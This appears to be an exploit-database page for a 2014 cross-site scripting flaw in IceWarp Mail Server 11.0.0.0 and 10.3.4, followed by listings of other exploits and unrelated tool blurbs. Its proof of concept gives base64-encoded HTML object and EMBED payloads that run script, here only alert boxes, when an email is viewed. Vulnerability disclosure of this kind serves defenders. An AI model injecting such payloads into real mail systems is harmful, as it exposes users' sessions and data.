Menu

Search for hundreds of thousands of exploits

"IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting"

Author

Exploit author

"Usman Saeed"

Platform

Exploit platform

php

Release date

Exploit published date

2014-02-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
Disclaimer:
[This code is for Educational Purposes , I would Not be responsible  
for any misuse of this code]

Attack type : Remote
Patch Status : Unpatched
Exploitation :
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# Twitter : http://twitter.com/emuess
# Original Advisory DATE: [29/01/2014]
# Publishing of Exploit Date : [17/02/2014]

Description
===========
It is possible to inject malicious HTML Elements into the email and  
cause a Cross site Scripting (XSS) payload to be executed.

Tested ICEWARP Client Versions (http://www.icewarp.com/)
============================
Version : 11.0.0.0 (2014-01-25) x64
& 10.3.4

Browser Used
=============
Mozilla Firefox 26.0

Proof Of Concept
============
Please find the details about the exploit : http://xc0re.net/blog/?p=363

Proof Of Concept
=================
For Version: ICEWARP 11.0.0

><object data=data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+></object>>

><EMBED SRC=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg== type=image/svg+xml AllowScriptAccess=always></EMBED>>

Note:

For Version: ICEWARP 10.3.4

<EMBED SRC=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg== type=image/svg+xml AllowScriptAccess=always></EMBED>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-12-11 "TP-Link wireless router Archer C1200 - Cross-Site Scripting" webapps hardware "Usman Saeed"
2018-12-11 "ZTE ZXHN H168N - Improper Access Restrictions" webapps hardware "Usman Saeed"
2018-12-11 "Huawei B315s-22 - Information Leak" webapps hardware "Usman Saeed"
2017-05-05 "Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure" webapps aspx "Usman Saeed"
2014-02-17 "IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting" webapps php "Usman Saeed"
2012-05-02 "iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting" webapps hardware "Usman Saeed"
2011-10-01 "Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service" dos multiple "Usman Saeed"
2010-11-23 "ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting" webapps multiple "Usman Saeed"
2010-05-10 "Xitami 5.0 - '/AUX' Request Remote Denial of Service" dos windows "Usman Saeed"
2009-10-26 "Cherokee Web server 0.5.4 - Denial of Service" dos windows "Usman Saeed"
2009-09-15 "BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass" remote windows "Usman Saeed"
2009-09-11 "kolibri+ Web Server 2 - Directory Traversal" remote windows "Usman Saeed"
2009-09-10 "Kolibri+ Web Server 2 - GET Denial of Service" dos windows "Usman Saeed"
2009-04-09 "Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection" webapps java "Usman Saeed"
2009-01-29 "Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting" remote hardware "Usman Saeed"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.